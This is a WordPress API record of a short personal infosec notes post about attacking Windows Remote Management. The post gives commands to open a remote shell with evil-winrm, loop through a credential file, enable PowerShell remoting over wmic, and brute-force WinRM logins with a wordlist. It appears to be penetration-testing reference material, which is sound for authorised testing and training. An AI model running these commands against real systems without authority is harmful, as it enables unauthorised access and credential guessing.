{"id":671,"date":"2020-02-14T21:03:23","date_gmt":"2020-02-14T20:03:23","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=671"},"modified":"2021-01-09T15:00:57","modified_gmt":"2021-01-09T14:00:57","slug":"windows-remote-management-winrm","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=671","title":{"rendered":"WinRM Windows Remote Management"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Win\u00addows Remote Man\u00adage\u00adment (Win\u00adRM \/ wsman) is a ser\u00advice which runs on port 5985 and&nbsp;5986.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Evil Winrm<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/Hackplayers\/evil-winrm\">Github<\/a> | Opens a shell for a&nbsp;user<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@kali:~# evil-winrm -i $victim -u melanie -p 'Welcome123!'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">For many&nbsp;users:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">for cred in $(cat user_pass.txt); do\n username=$(echo $cred | cut -d ',' -f 1)\n password=$(echo $cred | cut -d ',' -f 2)\n echo \"$username \/ $password\"\n evil-winrm -i $victim -u $username -p '$password'\ndone;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Com\u00admands:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>upload local remote<\/li><li>down\u00adload remote local<\/li><li>ser\u00advices<\/li><li>menu<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Activate from a&nbsp;shell<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">From a shell, Win\u00adRM can be activated:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wmic \/node:&lt;REMOTE_HOST&gt; process call create \"powershell enable-psremoting -force\"<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Brute force<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/mchoji\/winrm-brute\">Win\u00adRM<\/a> brute can brute force&nbsp;WinRM.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">bundle exec .\/winrm-brute.rb -u nathen -P \/root\/p141.general.1\/0270-worker\/enum\/cewl-words-from-cartoon-site.txt $victim<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Win\u00addows Remote Man\u00adage\u00adment (Win\u00adRM \/ wsman) is a ser\u00advice which runs on port 5985 and&nbsp;5986. Evil Win\u00adrm Github | Opens a shell for a&nbsp;user root@kali:~# evil-win\u00adrm \u2011i $vic\u00adtim \u2011u melanie \u2011p \u2018Welcome123!\u2019 For many&nbsp;users: for cred in $(cat user_pass.txt); do username=$(echo $cred | cut \u2011d \u2018,\u2019 \u2011f 1) password=$(echo $cred | cut \u2011d \u2018,\u2019 \u2011f [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[323],"tags":[24,182,209],"class_list":["post-671","post","type-post","status-publish","format-standard","hentry","category-protocol","tag-windows","tag-winrm","tag-wsman"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/671","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=671"}],"version-history":[{"count":8,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/671\/revisions"}],"predecessor-version":[{"id":2152,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/671\/revisions\/2152"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=671"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=671"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=671"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}